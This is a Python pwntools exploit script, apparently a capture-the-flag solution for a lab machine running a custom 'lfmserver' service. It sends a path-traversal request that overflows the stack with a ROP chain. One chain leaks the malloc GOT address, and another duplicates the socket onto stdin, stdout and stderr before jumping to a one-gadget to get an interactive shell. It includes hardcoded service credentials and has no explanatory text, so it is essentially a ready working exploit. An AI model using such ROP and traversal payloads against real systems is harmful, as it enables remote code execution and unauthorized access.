patents_video_exploit

patents.py

#!/usr/bin/env python3

from pwn import *

IP = '10.10.10.173'
PORT = 8888
USER = "lfmserver_user"
PASS = "!gby0l0r0ck$$!"
HASH = "dont_care"

binary = ELF('./lfmserver')

def url_encode(string):
    result = ""
    for char in string:
        if isinstance(char, int):
            char = chr(char)
        enc = "%{0:0>2}".format(format(ord(char), "x"))
        result += enc
    return result

def send(p, payload):
    buf = url_encode("../"*10)+"etc/passwd"+"%00"+url_encode("A"*119)+url_encode(payload)
    b = ""
    b += f"CHECK /{buf} "
    b += "LFM\r\n"
    b += f"User={USER}\r\n"
    b += f"Password={PASS}\r\n\r\n"
    b += f"{HASH}\n"
    p.send(b)

POP_RDI = 0x405c4b
POP_RSI_R15 = 0x405c49
FD = 6

'''
p = remote(IP, PORT, level='debug')
payload = b""
payload += p64(POP_RDI) 
payload += p64(FD)
payload += p64(POP_RSI_R15) 
payload += p64(binary.got['malloc'])
payload += p64(0xcafebabe) # dummy
payload += p64(binary.symbols['write'])
send(p, payload)
'''

base = 0x7fa8d3b0a000

MAGIC = 0x501e3
p = remote(IP, PORT, level='debug')
payload = b""
payload += p64(POP_RDI) + p64(FD) + p64(POP_RSI_R15) + p64(0x0) + p64(0xcafebabe) +  p64(binary.symbols['dup2'])
payload += p64(POP_RDI) + p64(FD)  + p64(POP_RSI_R15) + p64(0x1) +  p64(0xcafebabe) + p64(binary.symbols['dup2'])
payload += p64(POP_RDI) + p64(FD) + p64(POP_RSI_R15) + p64(0x2) + p64(0xcafebabe)+ p64(binary.symbols['dup2'])
payload += p64(base + MAGIC)
send(p, payload)
p.interactive()